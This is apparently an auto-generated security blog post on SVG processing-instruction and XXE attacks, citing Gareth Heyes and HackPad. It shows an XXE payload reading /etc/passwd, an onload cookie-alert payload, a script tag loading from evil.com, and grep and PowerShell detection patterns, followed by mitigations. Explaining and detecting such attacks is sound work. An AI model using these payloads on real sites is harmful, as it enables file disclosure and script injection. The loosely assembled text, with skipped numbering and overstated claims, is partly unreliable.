Listen to this Post
SVG (Scalable Vector Graphics) documents can be manipulated to include processing instructions, allowing attackers to execute malicious scripts or exfiltrate data. Gareth Heyes demonstrated how to use `XMLSerializer` to return the full SVG document, including processing instructions, potentially leading to security vulnerabilities in applications like HackPad.
You Should Know:
1. Understanding SVG Processing Instructions
SVG files support XML processing instructions (<? ... ?>), which can be abused to inject scripts or external entities. Example of a malicious SVG:
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <svg xmlns="http://www.w3.org/2000/svg" version="1.1"> <text>&xxe;</text> </svg>
2. Using XMLSerializer to Extract Full SVG
JavaScript’s `XMLSerializer` can serialize an SVG document, including hidden processing instructions:
const svg = document.querySelector('svg');
const serializer = new XMLSerializer();
const svgMarkup = serializer.serializeToString(svg);
console.log(svgMarkup); // May reveal hidden instructions
3. Exploiting HackPad via SVG
If HackPad improperly sanitizes SVG uploads, an attacker could:
– Steal cookies via embedded JavaScript:
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.cookie)"/>
– Load external resources via <script>:
<svg> <script href="http://evil.com/malicious.js"/> </svg>
4. Mitigation Techniques
- Sanitize SVG uploads using libraries like
DOMPurify. - Disable inline scripts via CSP:
Content-Security-Policy: script-src 'self'; object-src 'none'
- Validate XML structures before rendering.
- Linux Command to Check for Malicious SVGs
Use `grep` to detect suspicious processing instructions:
grep -r "<?xml-stylesheet\|<!ENTITY\|onload=" /var/www/uploads/
6. Windows PowerShell: Detecting Malformed SVGs
Get-ChildItem -Path "C:\web\svgs\" -Recurse | Select-String -Pattern "<?xml-stylesheet|<!ENTITY|onload="
What Undercode Say:
SVG-based attacks remain a significant threat due to their ability to bypass traditional XSS filters. Developers must enforce strict content sanitization and adopt CSP policies. Attackers will continue exploiting overlooked XML features, making proactive security essential.
Prediction:
As SVG usage grows in web apps, expect more sophisticated attacks leveraging processing instructions and XML external entities (XXE). Security teams should prioritize SVG sanitization in 2024.
Expected Output:
<svg> <!-- Malicious payload hidden in processing instructions --> <?xml-stylesheet type="text/xsl" href="data:,alert(1)"?> </svg>
Relevant URLs:
IT/Security Reporter URL:
Reported By: Gareth Heyes – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅
